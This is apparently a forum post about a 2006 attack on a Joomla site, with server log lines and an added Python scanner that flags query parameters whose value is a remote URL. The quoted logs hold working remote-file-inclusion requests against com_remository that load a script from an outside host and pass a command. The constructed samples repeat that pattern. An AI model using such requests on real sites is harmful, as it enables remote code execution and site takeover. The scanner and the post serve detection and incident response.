Server log fragments from the time of the attack:
Code:
128.194.135.81 - - [13/Aug/2006:13:43:19 +0200] "GET /index.php?option=com_simpleboard&Itemid=154&func=view&view=threaded&id=610&catid=16 HTTP/1.1" 200 3585 "-" "IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)"
128.194.135.81 - - [13/Aug/2006:13:44:00 +0200] "GET /index.php?option=com_simpleboard&Itemid=154&func=post&do=reply&replyto=610&catid=16 HTTP/1.1" 200 3585 "-" "IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)"
Code:
85.100.225.32 - - [13/Aug/2006:13:10:26 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id HTTP/1.1" 200 19518 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
85.100.225.32 - - [13/Aug/2006:13:10:28 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id HTTP/1.1" 200 36521 "http://wudeka.net/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
Turkish handiwork again, though this time I didn't find any haluk.php backdoor. Maybe they got pissed off that when they ran their haluk.php file they saw two skeletons, one of them screwing the other in the ass, with the caption "Fack the hackers"? :|
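
A log check for the request pattern in the entries above (a query parameter such as mosConfig_absolute_path whose value is a remote URL), added here as an example and not part of the original post. The function name, sample log lines, addresses and domains are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log: host ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
# A parameter value that is itself a remote URL is the remote-file-inclusion indicator.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_remote_includes(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format access line
        # Only the request target is inspected; the Referer field is ignored.
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double-encoded values
            if REMOTE_RE.match(value):
                hits.append({"ip": m.group("ip"), "time": m.group("time"),
                             "method": m.group("method"), "param": name,
                             "remote": value, "status": m.group("status")})
    return hits

# Constructed sample lines (documentation IP ranges and example domains only).
SAMPLE = [
    '192.0.2.10 - - [13/Aug/2006:13:43:19 +0200] "GET /index.php?option='
    'com_simpleboard&func=view&id=610 HTTP/1.1" 200 3585 "-" "ExampleBot/1.0"',
    '203.0.113.7 - - [13/Aug/2006:13:10:26 +0200] "GET /administrator/components/'
    'com_remository/admin.remository.php?mosConfig_absolute_path='
    'http://remote.example/payload.txt?&cmd=id HTTP/1.1" 200 19518 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Aug/2006:13:11:02 +0200] "GET /administrator/components/'
    'com_remository/admin.remository.php?mosConfig_absolute_path='
    'http%3A%2F%2Fremote.example%2Fpayload.txt%3F HTTP/1.1" 403 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [13/Aug/2006:13:12:40 +0200] "GET /index.php?option='
    'com_content&return=/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE):
        # A 2xx status means the request was served, not that the include succeeded.
        print(hit["time"], hit["ip"], hit["status"], hit["param"], hit["remote"])
```

A 200 on a flagged request is the cue to check the web root and temp directories for new or modified files around that timestamp.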